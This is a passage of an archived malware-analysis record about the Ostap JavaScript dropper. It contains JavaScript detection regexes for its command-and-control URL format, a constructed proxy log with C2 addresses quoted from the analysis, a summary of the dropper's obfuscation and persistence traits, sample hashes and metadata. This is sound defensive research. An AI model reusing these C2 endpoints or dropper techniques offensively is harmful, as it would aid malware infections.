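var RE_2016 = new RegExp('^https://' + IP_HOST + '/[^?]*[.]php[?]' +
  'add=([A-Za-z0-9]+)&([0-9]+)(&uid=([0-9]+)&out=([0-9]+)&ver=([0-9]+))?$');

// Returns {version, host, campaign, uid} for an Ostap-shaped URL, otherwise null.
function classifyOstapUrl(url) {
  var m = RE_2018.exec(url);
  if (m) return { version: '2018', host: m[1], campaign: m[4] + '=' + m[5], uid: m[7] };
  m = RE_2016.exec(url);
  if (m) return { version: '2016', host: m[1], campaign: m[4], uid: m[7] || null };
  return null;
}

// Constructed proxy log: '<timestamp> <client> <method> <url>' per line.
// Hosts and paths are the ones quoted in this article; clients and uids are made up.
var SAMPLE_LOG = [
  '2018-06-01T10:00:01Z 10.0.0.12 GET https://www.example.com/index.html',
  '2018-06-01T10:00:02Z 10.0.0.12 POST https://185.159.82.230/gazprom8/milertut.php?DeretghrttLolookest75=awsedrftgyhujiko&add=james&u=518878239&o=0&v=1&s=77',
  '2016-05-30T08:15:00Z 10.0.0.7 GET https://217.28.218.217/YOP634EFARRR/q64.php?add=gtyhbncdfewpnjm9oklmnfdrtqdczdfgrt&137',
  '2016-06-14T09:30:00Z 10.0.0.9 GET https://217.29.58.174:4433/MIKE/ostap.php?add=fty7ygvhuijhbvfdew2erfvghu8ujhvfcdxe4r5t6y&42&uid=518878239&out=0&ver=1',
  '2018-06-01T10:00:03Z 10.0.0.12 GET https://example.org/login.php?add=james&u=1'
];

// Walk the log and collect one hit per matching line, keyed by client address.
function scanLog(lines) {
  var hits = [];
  for (var i = 0; i < lines.length; i++) {
    var fields = lines[i].split(' ');
    var c = classifyOstapUrl(fields[3]);
    if (c) hits.push({ client: fields[1], version: c.version, host: c.host, campaign: c.campaign, uid: c.uid });
  }
  return hits;
}

var HITS = scanLog(SAMPLE_LOG);
```

The patterns anchor on the exact parameter order, so a campaign that adds or reorders parameters needs a new pattern; the host check deliberately rejects DNS names because every Ostap URL quoted in this article uses a bare IP address. A uid recovered from a hit can be compared with the value recomputed from a suspected host's Startup path and computer name to confirm which machine made the request.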
In summary, here is the list of characteristic elements of the Ostap malware:\r\nDistribution via large JSE files, delivered as ACE archives with a .rar extension\r\nMessage shown after the first execution of the script (PDF Error: The document could not be printed.)\r\nCharacteristic script obfuscation method\r\nPersistence (self-update capabilities, adding itself to the Startup folder)\r\nUnusual URL pattern https://\u003cip[:port]\u003e/\u003cpath\u003e.php?\u003ccampaign_id1\u003e=\u003ccampaign_id2\u003e\u0026add=james\u0026(arguments…)\r\nAdditional information\r\nExample samples:\r\nb48f7f004d1b4be1d5efa5fe838d202762f7e94a2f084e21f946d53de2521ce4 kopie_dokumenty.ace (2016, q64.php)\r\n4d618f3aa7990cc5013fb7f453311c058781cf7b1702f9ac3676aecda6e2c94e F.2016.06-07.ace (2016, ostap.php)\r\nb62f86ef5ef2086844b84ff6ac508c160ddeea94eee18648c86bcee129721b96 dropper.jse (2017)\r\nb790331a334e896c74f6e7f919895f1ee6cdd05a30c305b199e82386e71862b4 FV_030710645018.ace (2018)\r\nSamples after deobfuscation:\r\n2016-q64\r\n2016-ostap\r\n2017\r\n2018\r\nOstap was mentioned frequently in various articles (as an “interesting dropper” or “JS/Nemucod”):\r\nhttp://www.pentestingexperts.com/reverse-engineering-a-javascript-obfuscated-dropper/\r\nhttps://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/JS_NEMUCOD.ELDSAUGH\r\nhttps://www.joesandbox.com/analysis/36716/0/html\r\nSource: https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/"
	],
	"report_names": [
		"ostap-malware-analysis-backswap-dropper"
	],
	"threat_actors": [],
	"ts_created_at": 1775434739,
	"ts_updated_at": 1775791300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b224dcbbd8f5068ca670ef21e0b3d212595f4fb6.pdf",
		"text": "https://archive.orkl.eu/b224dcbbd8f5068ca670ef21e0b3d212595f4fb6.txt",
		"img": "https://archive.orkl.eu/b224dcbbd8f5068ca670ef21e0b3d212595f4fb6.jpg"
	}
}